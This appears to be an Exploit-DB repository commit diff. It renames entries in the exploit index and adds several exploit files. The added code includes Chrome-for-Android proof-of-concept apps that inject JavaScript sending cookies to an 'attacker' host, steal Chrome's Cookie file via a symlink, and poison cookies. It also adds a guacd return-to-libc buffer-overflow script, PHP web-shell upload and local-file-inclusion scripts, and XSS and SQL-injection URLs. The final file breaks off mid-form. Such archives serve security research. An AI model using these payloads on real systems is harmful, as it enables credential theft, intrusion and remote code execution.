DB: 2015-08-17

17 new exploits

files.csv

@@ -472,7 +472,7 @@ id,file,description,date,author,platform,type,port
 609,platforms/linux/remote/609.txt,"zgv 5.5 - Multiple Arbitrary Code Execution PoC Exploits",2004-10-28,infamous41md,linux,remote,0
 611,platforms/windows/dos/611.c,"chesapeake tftp server 1.0 - Directory Traversal and DoS PoC Exploit",2004-11-01,"Luigi Auriemma",windows,dos,0
 612,platforms/windows/remote/612.html,"Microsoft Internet Explorer 6 - (IFRAME Tag) Buffer Overflow Exploit",2004-11-02,Skylined,windows,remote,0
-616,platforms/windows/remote/616.c,"MiniShare <= 1.4.1 - Remote Buffer Overflow Exploit",2004-11-07,class101,windows,remote,80
+616,platforms/windows/remote/616.c,"MiniShare <= 1.4.1 - Remote Buffer Overflow Exploit (1)",2004-11-07,class101,windows,remote,80
 618,platforms/windows/remote/618.c,"Ability Server 2.34 - FTP STOR Buffer Overflow Exploit (Unix Exploit)",2004-11-07,NoPh0BiA,windows,remote,21
 619,platforms/windows/remote/619.c,"CCProxy Log Remote Stack Overflow Exploit",2004-11-09,Ruder,windows,remote,808
 620,platforms/linux/remote/620.c,"Qwik SMTP 0.3 - Remote Root Format String Exploit",2004-11-09,"Carlos Barros",linux,remote,25
@@ -488,7 +488,7 @@ id,file,description,date,author,platform,type,port
 631,platforms/php/webapps/631.txt,"vBulletin LAST.PHP SQL Injection Vulnerability",2004-11-15,N/A,php,webapps,0
 634,platforms/windows/dos/634.pl,"Secure Network Messenger <= 1.4.2 - Denial of Service Exploit",2004-11-15,ClearScreen,windows,dos,0
 635,platforms/php/webapps/635.txt,"miniBB - Input Validation Hole ('user')",2004-11-16,N/A,php,webapps,0
-636,platforms/windows/remote/636.c,"MiniShare 1.4.1 - Remote Buffer Overflow Exploit (c source)",2004-11-16,NoPh0BiA,windows,remote,80
+636,platforms/windows/remote/636.c,"MiniShare 1.4.1 - Remote Buffer Overflow Exploit (2)",2004-11-16,NoPh0BiA,windows,remote,80
 637,platforms/windows/remote/637.c,"MailCarrier 2.51 - Remote Buffer Overflow Exploit",2004-11-16,NoPh0BiA,windows,remote,25
 638,platforms/windows/remote/638.py,"SLMail 5.5 - POP3 PASS Buffer Overflow Exploit",2004-11-18,muts,windows,remote,110
 640,platforms/windows/remote/640.c,"Microsoft Windows - Compressed Zipped Folders Exploit (MS04-034)",2004-11-19,tarako,windows,remote,0
@@ -9277,7 +9277,7 @@ id,file,description,date,author,platform,type,port
 9893,platforms/windows/remote/9893.txt,"Microsoft Internet Explorer 5/6/7 - Memory Corruption PoC",2009-10-15,Skylined,windows,remote,80
 9894,platforms/windows/local/9894.txt,"Millenium MP3 Studio 2.0 - (m3u) BoF",2009-10-15,dellnull,windows,local,0
 9895,platforms/windows/local/9895.txt,"Millenium MP3 Studio 2.0 - (mpf) BoF",2009-10-14,dellnull,windows,local,0
-9896,platforms/windows/remote/9896.txt,"MiniShare HTTP 1.5.5 BoF",2009-10-19,iM4n,windows,remote,80
+9896,platforms/windows/remote/9896.txt,"MiniShare HTTP 1.5.5 - Remote Buffer Overflow Exploit",2009-10-19,iM4n,windows,remote,80
 9897,platforms/php/webapps/9897.txt,"Mongoose Web Server 2.8.0 Source Disclosure",2009-10-23,Dr_IDE,php,webapps,0
 9898,platforms/multiple/webapps/9898.txt,"Mura CMS 5.1 Root folder disclosure",2009-10-29,"Vladimir Vorontsov",multiple,webapps,0
 9900,platforms/windows/remote/9900.txt,"NaviCOPA <= 3.0.1.2 Source Disclosure",2009-10-14,Dr_IDE,windows,remote,0
@@ -11593,7 +11593,7 @@ id,file,description,date,author,platform,type,port
 12695,platforms/php/webapps/12695.txt,"Azimut Technologie Admin Login Bypass Vulnerability",2010-05-22,Ra3cH,php,webapps,0
 12696,platforms/php/webapps/12696.txt,"E-commerce Group (cat.php) SQL Injection Vulnerability",2010-05-22,"BLack Revenge",php,webapps,0
 12697,platforms/php/webapps/12697.php,"hustoj - (fckeditor) Remote Arbitrary File Upload Exploit",2010-05-22,eidelweiss,php,webapps,0
-12698,platforms/windows/dos/12698.py,"Open&Compact Ftp Server 1.2 - _PORT_ command Remote DoS",2010-05-22,Ma3sTr0-Dz,windows,dos,0
+12698,platforms/windows/dos/12698.py,"(Gabriel's FTP Server) Open&Compact FTP Server 1.2 - _PORT_ Command Remote DoS",2010-05-22,Ma3sTr0-Dz,windows,dos,0
 12699,platforms/php/webapps/12699.txt,"eWebEditor 1.x - (WYSIWYG) Remote File Upload",2010-05-22,Ma3sTr0-Dz,php,webapps,0
 12700,platforms/asp/webapps/12700.txt,"DotNetNuke Remote File upload Vulnerability",2010-05-22,"Ra3cH and Ma3sTr0-Dz",asp,webapps,0
 12701,platforms/asp/webapps/12701.txt,"Rave Creations/UHM (artists.asp) SQL Injection Vulnerability",2010-05-22,Ra3cH,asp,webapps,0
@@ -11631,7 +11631,7 @@ id,file,description,date,author,platform,type,port
 12736,platforms/php/webapps/12736.txt,"Website Design and Hosting By Netricks Inc - (news.php) SQL Injection Vulnerability",2010-05-25,"Dr.SiLnT HilL",php,webapps,0
 12737,platforms/php/webapps/12737.txt,"Simpel Side - (index2.php) SQL Injection Vulnerability",2010-05-25,MN9,php,webapps,0
 12740,platforms/windows/dos/12740.py,"Webby Webserver - PoC SEH control (0day)",2010-05-25,m-1-k-3,windows,dos,0
-12741,platforms/windows/dos/12741.py,"Open&Compact Ftp Server 1.2 - Universal Pre-Auth Denial of Service",2010-05-25,Dr_IDE,windows,dos,0
+12741,platforms/windows/dos/12741.py,"(Gabriel's FTP Server) Open&Compact FTP Server 1.2 - Universal Pre-Auth Denial of Service",2010-05-25,Dr_IDE,windows,dos,0
 12743,platforms/php/webapps/12743.txt,"web5000 (page_show) SQL Injection Vulnerability",2010-05-25,"BLack Revenge",php,webapps,0
 12744,platforms/php/webapps/12744.txt,"Webit CMS SQL Injection Vulnerability",2010-05-25,CoBRa_21,php,webapps,0
 12746,platforms/php/webapps/12746.txt,"Spaceacre (SQL/XSS/HTML) Injection Vulnerabilities",2010-05-26,XroGuE,php,webapps,0
@@ -12273,7 +12273,7 @@ id,file,description,date,author,platform,type,port
 13929,platforms/php/webapps/13929.txt,"Banner Management Script SQL Injection",2010-06-18,"L0rd CrusAd3r",php,webapps,0
 13930,platforms/php/webapps/13930.txt,"Shopping Cart Script with Affiliate Program SQL Injection",2010-06-18,"L0rd CrusAd3r",php,webapps,0
 13931,platforms/php/webapps/13931.txt,"Kubelance SQL Injection (profile.php?id)",2010-06-18,"L0rd CrusAd3r",php,webapps,0
-13932,platforms/windows/remote/13932.py,"Open&Compact Ftp Server <= 1.2 - Full System Access",2010-06-18,"Serge Gorbunov",windows,remote,0
+13932,platforms/windows/remote/13932.py,"(Gabriel's FTP Server) Open&Compact FTP Server <= 1.2 - Full System Access",2010-06-18,"Serge Gorbunov",windows,remote,0
 13933,platforms/php/webapps/13933.txt,"UK One Media CMS (id) Error Based SQL Injection Vulnerability",2010-06-19,LiquidWorm,php,webapps,0
 13934,platforms/windows/dos/13934.py,"MoreAmp (.maf) Buffer Overflow PoC",2010-06-19,Sid3^effects,windows,dos,0
 13935,platforms/php/webapps/13935.txt,"Joomla Component RSComments 1.0.0 Persistent XSS",2010-06-19,jdc,php,webapps,0
@@ -13533,7 +13533,7 @@ id,file,description,date,author,platform,type,port
 15572,platforms/php/webapps/15572.txt,"viart shop 4.0.5 - Multiple Vulnerabilities",2010-11-19,Ariko-Security,php,webapps,0
 15573,platforms/php/webapps/15573.html,"PHPGallery 1.1.0 - CSRF Vulnerability",2010-11-19,Or4nG.M4N,php,webapps,0
 15574,platforms/php/webapps/15574.txt,"Arabian Youtube Script Blind SQL Injection Vulnerability",2010-11-19,R3d-D3V!L,php,webapps,0
-15575,platforms/windows/local/15575.py,"Minishare 1.5.5 - BoF Vulnerability (users.txt) - EggHunter -",2010-11-19,0v3r,windows,local,0
+15575,platforms/windows/local/15575.py,"Minishare 1.5.5 - BoF Vulnerability (users.txt) - EggHunter",2010-11-19,0v3r,windows,local,0
 15577,platforms/php/webapps/15577.html,"Plogger Gallery 1.0 - CSRF Change Admin Password",2010-11-19,Or4nG.M4N,php,webapps,0
 15578,platforms/php/webapps/15578.txt,"DVD Rental Software SQL Injection Vulnerability",2010-11-19,JaMbA,php,webapps,0
 15580,platforms/windows/dos/15580.pl,"Native Instruments Traktor Pro 1.2.6 Stack-based Buffer Overflow Vulnerability",2010-11-20,LiquidWorm,windows,dos,0
@@ -24524,7 +24524,7 @@ id,file,description,date,author,platform,type,port
 27398,platforms/php/webapps/27398.txt,"Pluck CMS 4.7 - HTML Code Injection",2013-08-07,"Yashar shahinzadeh",php,webapps,0
 27399,platforms/php/webapps/27399.txt,"Wordpress Booking Calendar 4.1.4 - CSRF Vulnerability",2013-08-07,"Dylan Irzi",php,webapps,0
 27400,platforms/windows/remote/27400.py,"HP Data Protector Arbitrary Remote Command Execution",2013-08-07,"Alessandro Di Pinto and Claudio Moletta",windows,remote,0
-27401,platforms/windows/remote/27401.py,"Open&Compact FTP Server <= 1.2 (Gabriel's FTP Server) - Auth Bypass & Directory Traversal SAM Retrieval Exploit",2013-08-07,Wireghoul,windows,remote,0
+27401,platforms/windows/remote/27401.py,"(Gabriel's FTP Server) Open&Compact FTP Server <= 1.2 - Auth Bypass & Directory Traversal SAM Retrieval Exploit",2013-08-07,Wireghoul,windows,remote,0
 27402,platforms/hardware/webapps/27402.txt,"Hikvision IP Cameras 4.1.0 b130111 - Multiple Vulnerabilities",2013-08-07,"Core Security",hardware,webapps,0
 27403,platforms/php/webapps/27403.txt,"Wordpress Usernoise Plugin 3.7.8 - Persistent XSS Vulnerability",2013-08-07,RogueCoder,php,webapps,0
 27405,platforms/php/webapps/27405.txt,"Joomla Sectionex Component 2.5.96 - SQL Injection Vulnerability",2013-08-07,"Matias Fontanini",php,webapps,0
@@ -34098,3 +34098,20 @@ id,file,description,date,author,platform,type,port
 37776,platforms/windows/dos/37776.py,"Ability FTP Server 2.1.4 - Admin Panel AUTHCODE Command Remote DoS",2015-08-15,St0rn,windows,dos,0
 37777,platforms/linux/dos/37777.txt,"Ubuntu 14.04 NetKit FTP Client - Crash/DoS PoC",2015-08-15,"TUNISIAN CYBER",linux,dos,0
 37778,platforms/hardware/webapps/37778.txt,"Security IP Camera Star Vision DVR - Authentication Bypass",2015-08-15,"Meisam Monsef",hardware,webapps,0
+37779,platforms/php/webapps/37779.txt,"Flogr 'index.php' Multiple Cross Site Scripting Vulnerabilities",2012-09-05,"High-Tech Bridge",php,webapps,0
+37780,platforms/windows/local/37780.c,"ThinPrint 'tpfc.dll' Insecure Library Loading Arbitrary Code Execution Vulnerability",2012-09-04,"Moshe Zioni",windows,local,0
+37781,platforms/php/webapps/37781.txt,"ExtCalendar 2.0 Multiple SQL Injection and HTML Injection Vulnerabilities",2012-09-05,"Ashiyane Digital Security Team",php,webapps,0
+37782,platforms/php/webapps/37782.txt,"web@all Local File Include and Multiple Arbitrary File Upload Vulnerabilities",2012-09-06,KedAns-Dz,php,webapps,0
+37783,platforms/linux/dos/37783.c,"GNU glibc 'strcoll()' Routine Integer Overflow Vulnerability",2012-09-07,"Jan iankko Lieskovsky",linux,dos,0
+37784,platforms/php/webapps/37784.txt,"Pinterestclones Security Bypass and HTML Injection Vulnerabilities",2012-09-08,DaOne,php,webapps,0
+37785,platforms/php/webapps/37785.txt,"VICIDIAL Call Center Suite Multiple SQL Injection",2012-09-10,"Sepahan TelCom IT Group",php,webapps,0
+37786,platforms/php/webapps/37786.txt,"DeltaScripts PHP Links Multiple SQL Injection Vulnerabilities",2012-09-10,L0n3ly-H34rT,php,webapps,0
+37787,platforms/php/webapps/37787.txt,"WordPress Download Monitor Plugin 'dlsearch' Parameter Cross Site Scripting Vulnerability",2012-08-30,"Chris Cooper",php,webapps,0
+37788,platforms/linux/remote/37788.py,"libguac Remote Buffer Overflow Vulnerability",2012-09-11,"Michael Jumper",linux,remote,0
+37789,platforms/php/webapps/37789.txt,"Openfiler 2.3 Multiple Cross Site Scripting and Information Disclosure Vulnerabilities",2012-09-06,"Brendan Coles",php,webapps,0
+37790,platforms/php/webapps/37790.txt,"FBDj 'id' Parameter SQL Injection Vulnerability",2012-09-11,"TUNISIAN CYBER",php,webapps,0
+37791,platforms/multiple/webapps/37791.txt,"Atlassian Confluence 3.4.x Error Page Cross Site Scripting Vulnerability",2012-09-12,"D. Niedermaier",multiple,webapps,0
+37792,platforms/android/remote/37792.txt,"Google Chrome for Android com.android.browser.application_id Intent Extra Data XSS",2012-09-12,"Artem Chaykin",android,remote,0
+37793,platforms/android/remote/37793.txt,"Google Chrome for Android Multiple file:: URL Handler Local Downloaded Content Disclosure",2012-09-12,"Artem Chaykin",android,remote,0
+37794,platforms/android/remote/37794.txt,"Google Chrome for Android Local Application Handling Cookie Theft Weakness",2012-09-12,"Artem Chaykin",android,remote,0
+37795,platforms/android/remote/37795.txt,"Google Chrome for Android Same-origin Policy Bypass Local Symlink Weakness",2012-09-12,"Artem Chaykin",android,remote,0

platforms/android/remote/37792.txt

@@ -0,0 +1,57 @@
+source: http://www.securityfocus.com/bid/55523/info
+
+Google Chrome for Android is prone to multiple vulnerabilities.
+
+Attackers may exploit these issues to execute arbitrary code in the context of the browser, obtain potentially sensitive information, bypass the same-origin policy, and steal cookie-based authentication credentials; other attacks are also possible.
+
+Versions prior to Chrome for Android 18.0.1025308 are vulnerable. 
+
+package jp.mbsd.terada.attackchrome1;
+  
+  import android.app.Activity;
+  import android.os.Bundle;
+  import android.content.Intent;
+  import android.net.Uri;
+  
+  public class Main extends Activity {
+      @Override
+      public void onCreate(Bundle savedInstanceState) {
+          super.onCreate(savedInstanceState);
+          setContentView(R.layout.main);
+          doit();
+      }
+  
+      // get intent to invoke the chrome app
+      public Intent getIntentForChrome(String url) {
+          Intent intent = new Intent("android.intent.action.VIEW");
+          intent.setClassName("com.android.chrome", "com.google.android.apps.chrome.Main");
+          intent.setData(Uri.parse(url));
+          return intent;
+      }
+  
+      public void doit() {
+          try {
+              // At first, force the chrome app to open a target Web page
+              Intent intent1 = getIntentForChrome("http://www.google.com/1");
+              startActivity(intent1);
+  
+              // wait a few seconds
+              Thread.sleep(3000);
+  
+              // JS code to inject into the target (www.google.com)
+              String jsURL = "javascript:var e=encodeURIComponent,img=document.createElement('img');"
+                  + "img.src='http://attacker/?c='+e(document.cookie)+'&d='+e(document.domain);"
+                  + "document.body.appendChild(img);";
+  
+              Intent intent2 = getIntentForChrome(jsURL);
+  
+              // Trick to prevent Chrome from opening the JS URL in a different tab
+              intent2.putExtra("com.android.browser.application_id", "com.android.chrome");
+              intent2.addFlags(Intent.FLAG_ACTIVITY_SINGLE_TOP);
+  
+              // Inject JS into the target Web page
+              startActivity(intent2);
+          }
+          catch (Exception e) {}
+      }
+  }

platforms/android/remote/37793.txt

@@ -0,0 +1,25 @@
+source: http://www.securityfocus.com/bid/55523/info
+ 
+Google Chrome for Android is prone to multiple vulnerabilities.
+ 
+Attackers may exploit these issues to execute arbitrary code in the context of the browser, obtain potentially sensitive information, bypass the same-origin policy, and steal cookie-based authentication credentials; other attacks are also possible.
+ 
+Versions prior to Chrome for Android 18.0.1025308 are vulnerable. 
+
+// This is a part of malicious Android app.
+  public void attack() {
+    try {
+      // let Chrome app load its Cookies file, so that Chrome app
+      // automatically save it to /sdcard/Download/ directory.
+      Intent intent = new Intent("android.intent.action.VIEW");
+      intent.setClassName("com.android.chrome", "com.google.android.apps.chrome.Main");
+      intent.setData(Uri.parse("file:///data/data/com.android.chrome/app_chrome/Default/Cookies"));
+      startActivity(intent);
+  
+      // wait a few seconds
+      Thread.sleep(3000);
+  
+      // read the Cookie file (/sdcard/Download/Cookies.bin)
+      FileInputStream fis = new FileInputStream("/sdcard/Download/Cookies.bin");
+      ...
+  }

platforms/android/remote/37794.txt

@@ -0,0 +1,87 @@
+source: http://www.securityfocus.com/bid/55523/info
+  
+Google Chrome for Android is prone to multiple vulnerabilities.
+  
+Attackers may exploit these issues to execute arbitrary code in the context of the browser, obtain potentially sensitive information, bypass the same-origin policy, and steal cookie-based authentication credentials; other attacks are also possible.
+  
+Versions prior to Chrome for Android 18.0.1025308 are vulnerable. 
+
+package jp.mbsd.terada.attackchrome1;
+  
+  import android.app.Activity;
+  import android.os.Bundle;
+  import android.util.Log;
+  import android.content.Intent;
+  import android.net.Uri;
+  
+  public class Main extends Activity {
+    // TAG for logging.
+    public final static String TAG = "attackchrome1";
+  
+    // Cookie file path of Chrome.
+    public final static String CHROME_COOKIE_FILE_PATH =
+      "/data/data/com.android.chrome/app_chrome/Default/Cookies";
+  
+    // Temporaly directory in which the symlink will be created.
+    public final static String MY_TMP_DIR =
+      "/data/data/jp.mbsd.terada.attackchrome1/tmp/";
+  
+    // The path of the Symlink (must have "html" extension)
+    public final static String LINK_PATH = MY_TMP_DIR + "cookie.html";
+  
+    @Override
+    public void onCreate(Bundle savedInstanceState) {
+      super.onCreate(savedInstanceState);
+      setContentView(R.layout.main);
+      doit();
+    }
+  
+    // Method to invoke Chrome.
+    public void invokeChrome(String url) {
+      Intent intent = new Intent("android.intent.action.VIEW");
+      intent.setClassName("com.android.chrome", "com.google.android.apps.chrome.Main");
+      intent.setData(Uri.parse(url));
+      startActivity(intent);
+    }
+  
+    // Method to execute OS command.
+    public void cmdexec(String[] cmd) {
+      try {
+        Runtime.getRuntime().exec(cmd);
+      }
+      catch (Exception e) {
+        Log.e(TAG, e.getMessage());
+      }
+    }
+  
+    // Main method.
+    public void doit() {
+      try {
+        // Create the symlink in this app's temporary directory.
+        // The symlink points to Chrome's Cookie file.
+        cmdexec(new String[] {"/system/bin/mkdir", MY_TMP_DIR});
+        cmdexec(new String[] {"/system/bin/ln", "-s", CHROME_COOKIE_FILE_PATH, LINK_PATH});
+        cmdexec(new String[] {"/system/bin/chmod", "-R", "777", MY_TMP_DIR});
+  
+        Thread.sleep(1000);
+  
+        // Force Chrome to load attacker's web page to poison Chrome's Cookie file.
+        // Suppose the web page sets a Cookie as below.
+        //   x=<img><script>document.images[0].src='http://attacker/?'
+        //     +encodeURIComponent(document.body.innerHTML)</script>;
+        //     expires=Tue, 01-Jan-2030 00:00:00 GMT
+        String url1 = "http://attacker/set_malicious_cookie.php";
+        invokeChrome(url1);
+  
+        Thread.sleep(10000);
+  
+        // Force Chrome to load the symlink.
+        // Chrome renders the content of the Cookie file as HTML.
+        String url2 = "file://" + LINK_PATH;
+        invokeChrome(url2);
+      }
+      catch (Exception e) {
+        Log.e(TAG, e.getMessage());
+      }
+    }
+  }

platforms/android/remote/37795.txt

@@ -0,0 +1,22 @@
+source: http://www.securityfocus.com/bid/55523/info
+   
+Google Chrome for Android is prone to multiple vulnerabilities.
+   
+Attackers may exploit these issues to execute arbitrary code in the context of the browser, obtain potentially sensitive information, bypass the same-origin policy, and steal cookie-based authentication credentials; other attacks are also possible.
+   
+Versions prior to Chrome for Android 18.0.1025308 are vulnerable. 
+
+<body>
+     <u>Wait a few seconds.</u>
+     <script>
+     function doitjs() {
+       var xhr = new XMLHttpRequest;
+       xhr.onload = function() {
+         alert(xhr.responseText);
+       };
+       xhr.open('GET', document.URL);
+       xhr.send(null);
+     }
+     setTimeout(doitjs, 8000);
+     </script>
+</body>

platforms/linux/dos/37783.c

@@ -0,0 +1,32 @@
+source: http://www.securityfocus.com/bid/55462/info
+
+GNU glibc is prone to a remote integer-overflow vulnerability which leads to buffer overflow vulnerability.
+
+Successful exploits may allow an attacker to execute arbitrary code in the context of a user running an application that uses the affected library. Failed exploit attempts may crash the application, denying service to legitimate users. 
+
+#include <locale.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+
+#define SIZE 429496730
+
+int
+main (void)
+{
+  char *p = malloc (1 + SIZE);
+  if (setlocale (LC_COLLATE, "en_GB.UTF-8") == NULL)
+    {
+      puts ("setlocale failed, cannot test for overflow");
+      return 0;
+    }
+  if (p == NULL)
+    {
+      puts ("malloc failed, cannot test for overflow");
+      return 0;
+    }
+  memset (p, 'x', SIZE);
+  p[SIZE] = 0;
+  printf ("%d\n", strcoll (p, p));
+  return 0;
+}

platforms/linux/remote/37788.py

@@ -0,0 +1,29 @@
+source: http://www.securityfocus.com/bid/55497/info
+
+libguac is prone to a remote buffer-overflow vulnerability.
+
+Attackers can exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in denial-of-service conditions. 
+
+#!/usr/bin/python
+# CVE-2012-4415: PoC for guacd buffer overflow vulnerability # # Copyright (c) 2012 Timo Juhani Lindfors <timo.lindfors@iki.fi> # # Allows arbitrary code execution on Debian i386 guacd 0.6.0-1 with # default configuration. Uses return-to-libc to bypass non-executable # stack.
+#
+import socket, struct
+PROTOCOL_ADDRESS = 0xbf807e9f
+SYSTEM_ADDRESS = 0xb76e7640
+class GuacdPOC:
+    def __init__(self, command):
+        self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+        self.sock.connect(('localhost', 4822))
+        self.s("select")
+        self.c(",")
+        protocol = (command + "; " + "#" * 265)[:265]
+        protocol += struct.pack("L", PROTOCOL_ADDRESS)
+        protocol += struct.pack("L", SYSTEM_ADDRESS)
+        self.s(protocol)
+        self.c(";")
+    def s(self, x):
+        self.sock.send("%d.%s" % (len(x), x))
+    def c(self, x):
+        self.sock.send(x)
+GuacdPOC("touch /tmp/owned")
+

platforms/multiple/webapps/37791.txt

@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/55509/info
+
+Atlassian Confluence is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+Atlassian Confluence versions prior to 4.1.9 are vulnerable. 
+
+ http://www.example.com/pages/includes/status-list-mo%3CIFRAME%20SRC%3D%22javascript%3Aalert%28%27XSS%27%29%22%3E.vm 
+

platforms/php/webapps/37779.txt

@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/55418/info
+
+Flogr is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+Flogr 2.5.6 is vulnerable; prior versions may also be affected. 
+
+http://www.example.com/index.php/%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E/
+
+http://www.example.com/index.php?[any]=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E 

platforms/php/webapps/37781.txt

@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/55424/info
+
+ExtCalendar is prone to multiple SQL-injection vulnerabilities and an HTML-injection vulnerability because it fails to sufficiently sanitize user-supplied input.
+
+Exploiting these issues may allow an attacker to compromise the application, access or modify data, exploit vulnerabilities in the underlying database, execute HTML and script code in the context of the affected site, and steal cookie-based authentication credentials; other attacks are also possible.
+
+ExtCalendar 2.0 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/calendar.php?mode=view&id={SQL}
+http://www.example.com/calendar.php?mode=cat&cat_id={SQL}
+http://www.example.com/calendar/cal_popup.php?mode=view&id={SQL} 

platforms/php/webapps/37782.txt

@@ -0,0 +1,115 @@
+source: http://www.securityfocus.com/bid/55426/info
+
+web@all is prone to a local file-include vulnerability and multiple arbitrary file-upload vulnerabilities.
+
+An attacker can exploit these issues to upload arbitrary files onto the web server, execute arbitrary local files within the context of the web server, and obtain sensitive information.
+
+web@all 2.0 is vulnerable; other versions may also be affected. 
+
+1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
+0     _                   __           __       __                     1
+1   /' \            __  /'__`\        /\ \__  /'__`\                   0
+0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
+1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
+0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
+1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
+0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
+1                  \ \____/ >> Exploit database separated by exploit   0
+0                   \/___/          type (local, remote, DoS, etc.)    1
+1                                                                      1
+0  [+] Site            : 1337day.com                                   0
+1  [+] Support e-mail  : submit[at]1337day.com                         1
+0                                                                      0
+1               #########################################              1
+0               I'm KedAns-Dz member from Inj3ct0r Team                1
+1               #########################################              0
+0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
+
+###
+# Title : Web@all CMS v2.0 <= (ShellUpload/LFI) Multiple Vulnerabilities
+# Author : KedAns-Dz
+# E-mail : ked-h (@hotmail.com / @1337day.com)
+# Home : Hassi.Messaoud (30500) - Algeria -(00213555248701)
+# Web Site : www.1337day.com | www.inj3ct0rs.com
+# FaCeb0ok : http://fb.me/Inj3ct0rK3d
+# Friendly Sites : www.r00tw0rm.com * www.exploit-id.com
+# Platform/CatID : php - WebApp - Multiple - 0day
+# Type : Multiple Vulnerabilities
+# Tested on : Windows XP-SP3 (Fr) / Linux.BackTrack5-rc2 (En)
+# Founder : [http://webatall.org]
+###
+
+# <3 <3 Greetings t0 Palestine <3 <3
+# Greetings bY {KhalEd Ked'Ans} ^___^ I MiSS yA'll br0thEr'S <3
+
+# n0 d0Rk's Kidd's d0 S0me W0rk's yaa33' -_-"
+
+<!-- Proof of Concept ,p0c(1) -->
+<!-- Shell Upload .PHP -->
+<?php
+
+$uploadfile="inj3ct0r.php";
+$ch = curl_init("http://[Target]/[path]/my/kindeditor/php/upload_json.php");
+curl_setopt($ch, CURLOPT_POST, true);
+curl_setopt($ch, CURLOPT_POSTFIELDS,
+       array('imgFile'=>"@$uploadfile"));
+curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
+$postResult = curl_exec($ch);
+curl_close($ch);
+print "$postResult";
+
+?>
+
+[*] 0r Use TemperDATA ->(/[path]/my/kindeditor/php/upload_json.php) and POST u'R Sh3lL
+
+[!] Change inj3ct0r.php -> t0 U'r Sh3lL '_*
+[+] Access Shell http://[Target]/[path]/file/[ Ym 'dir]/{raW-File-Name}.php
+
+<!-- Proof of Concept ,p0c(2) -->
+<!-- Shell Upload .GIF -->
+<?php
+
+$uploadfile="inj3ct0r.gif";
+$ch = curl_init("http://[Target]/[path]/inc/cls_upload.php");
+curl_setopt($ch, CURLOPT_POST, true);
+curl_setopt($ch, CURLOPT_POSTFIELDS,
+       array('tmp_name'=>"@$uploadfile"));
+curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
+$postResult = curl_exec($ch);
+curl_close($ch);
+print "$postResult";
+
+?>
+
+[*] 0r Use TemperDATA ->(/[path]/inc/cls_upload.php) and POST u'R Sh3lL
+
+[!] Change inj3ct0r.gif -> t0 U'r Sh3lL '_*
+[+] Access Shell http://[Target]/[path]/file/temp/[ Ym 'dir]/{raW-File-Name}.gif
+
+<!-- Proof of Concept ,p0c(3) -->
+<!-- Local File Include -->
+<?php
+$lfi =
+curl_init("http://[Target]/[path]/my/kindeditor/index.php");
+curl_setopt($lfi, CURLOPT_POST, true);
+curl_setopt($lfi, CURLOPT_POSTFIELDS,
+  array('lang'=>"../../../../../../../../[ LFI ]%00"));
+curl_setopt($lfi, CURLOPT_RETURNTRANSFER, 1);
+$postResult = curl_exec($lfi);
+curl_close($lfi);
+print "$postResult";
+?>
+
+[*] 0r Use TemperDATA ->(/[path]/my/kindeditor/index.php) POST and GET s0me Local File's
+
+#### << ThE|End -- Go0d'LuCk All .:-'___'-:. 
+
+#================[ Exploited By KedAns-Dz * Inj3ct0r Team * ]===============================================
+# Greets To : Dz Offenders Cr3w < Algerians HaCkerS > | Indoushka , Caddy-Dz , Kalashinkov3 , Mennouchi.Islem 
+# Jago-dz , Over-X , Kha&miX , Ev!LsCr!pT_Dz, KinG Of PiraTeS, TrOoN, T0xic, Chevr0sky, Black-ID, Barbaros-DZ,
+# +> Greets To Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re (1337day.com) * CrosS (r00tw0rm.com)
+# Inj3ct0r Members 31337 : KedAns ^^ * KnocKout * SeeMe * Kalashinkov3 * ZoRLu * anT!-Tr0J4n * Angel Injection
+# NuxbieCyber (www.1337day.com/team) * Dz Offenders Cr3w * Algerian Cyber Army * xDZx * HD Moore * YMCMB ..all
+# Exploit-ID Team : jos_ali_joe + kaMtiEz + r3m1ck (exploit-id.com) * Milw0rm * KeyStr0ke * JF * L3b-r1Z * HMD
+# packetstormsecurity.org * metasploit.com * r00tw0rm.com * OWASP Dz * Dis9-UE * All Security and Exploits Webs
+#============================================================================================================

platforms/php/webapps/37784.txt

@@ -0,0 +1,24 @@
+source: http://www.securityfocus.com/bid/55469/info
+
+Pinterestclones is prone to a security-bypass vulnerability and an HTML-injection vulnerability because it fails to properly validate user permissions and sanitize user-supplied input.
+
+An attacker may leverage the HTML-injection issue to inject hostile HTML and script code that would run in the context of the affected site, potentially allowing an attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. The attacker may leverage the security-bypass issue to bypass certain security restrictions and perform unauthorized actions in the affected application. 
+
+<form action="http://www.example.com/admin/settings.php" method="post" class="niceform" name="frmname" enctype="multipart/form-data">
+Name:<input type="text" class="txtFname" name="name" id="name" size="50" value="Admin"/>
